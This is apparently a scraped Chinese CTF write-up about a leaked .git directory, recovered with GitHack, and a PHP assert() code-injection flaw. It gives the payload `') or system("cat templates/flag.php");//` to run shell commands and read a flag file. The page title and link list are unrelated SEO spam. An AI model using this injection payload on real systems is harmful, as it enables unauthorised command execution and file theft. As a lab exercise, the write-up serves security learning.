当前位置: 首页 > news >正文

黄岩城乡住房和建设局网站/安卓手机性能优化软件

news 2025/7/17 14:33:59
黄岩城乡住房和建设局网站,安卓手机性能优化软件,企业搭建网站哪家好,页面好看的网站一个git源码泄露题目 文章目录git源码泄露源码分析构造payloadgit源码泄露 打开容器,页面如下 点击About,提示git源码泄露 在url后面加上了/.git/,证明了这一点 然后使用工具进行git源码下载,工具:https://github.com/BugSca…

一个git源码泄露题目

文章目录

    • git源码泄露
    • 源码分析
    • 构造payload

git源码泄露

打开容器,页面如下

在这里插入图片描述

点击About,提示git源码泄露
在这里插入图片描述

在url后面加上了/.git/,证明了这一点
在这里插入图片描述

然后使用工具进行git源码下载,工具:https://github.com/BugScanTeam/GitHack
在python2的环境下进行源码下载

python GitHack.py http://111.200.241.244:59908/.git/

在这里插入图片描述

最后在./dist文件夹下得到源码index.php和templates

源码分析

//index.php
<?phpif (isset($_GET['page'])) {$page = $_GET['page'];
} else {$page = "home";
}$file = "templates/" . $page . ".php";// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");//strpos函数是查找..存在的首位置// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");?>

然后就是templates文件夹,知道了flag.php的相对位置,在./templates/flag.php中

在这里插入图片描述

构造payload

在index.php中,我们发现了一处可利用的地方

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");//strpos函数是查找..存在的首位置// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

因为本题没有对我们传入的page参数进行过滤,所以我们就可以进行代码拼接,然后注释掉后面的冗余代码
payload

?page=') or system("cat templates/flag.php");//

在这里插入图片描述

http://www.lbrq.cn/news/2280385.html

相关文章:

  • 重庆营销型网站开发/网站统计系统
  • 商丘给企业做网站的公司/友情链接模板
  • 免费游戏网站制作/百度推广热线电话
  • 如何把地图放到网站上/有人看片吗免费观看视频
  • 免费网站下载软件免费/东莞seo推广公司
  • 云南城市建设职业学院网站/东莞网站提升排名
  • 您身边的网站建设专家/公司网络组建方案
  • 国内出名的设计网站有哪些/沈阳专业seo排名优化公司
  • 做企业网站哪家公司专业/网络销售怎么做才能有业务
  • 最好的app制作网站/seo站内优化技巧
  • 建设公司网站建设报价/网站域名费一年多少钱
  • 网上商城网站建设规划/恶意点击广告软件
  • php餐饮网站/谷歌安装器
  • html css仿wordpress/优化方案模板
  • 用户访问域名劫持网站/青岛seo整站优化哪家专业
  • 公务员写作网站/网络域名
  • wordpress注册取消邮箱/深圳网络seo推广
  • 私人小型服务器/重庆百度快速优化
  • 安卓app定制/seo及网络推广招聘
  • 介绍自己做衣服的网站/怎么做网站模板
  • 做网站知名的学习网站/semaphore
  • 网站排名优化公司/网络营销推广的优势
  • 建设网站的获客渠道/百度输入法下载
  • php网站系统/广州seo服务
  • 上海恒鑫网站建设/seo网站优化案例
  • 郴州全网推广公/北京百度seo排名
  • 个人博客手机网站模板/app 推广
  • 营销网站建站公司转让/什么推广方法是有效果的
  • 网站开发规范/网站关键词优化怎么弄
  • 免费提供ppt模板的网站/seo关键词排名优化哪好
  • 为什么要用erc165识别erc721或erc1155
  • JVM——编译执行于解释执行的区别是什么?JVM使用哪种方式?
  • 淘宝扭蛋机小程序开发:重构电商娱乐化体验的新范式
  • HarmonyOS从入门到精通:动画设计与实现之九 - 实用动画案例详解(下)
  • ZYNQ双核通信终极指南:FreeRTOS移植+OpenAMP双核通信+固化实战
  • gitignore添加后如何生效?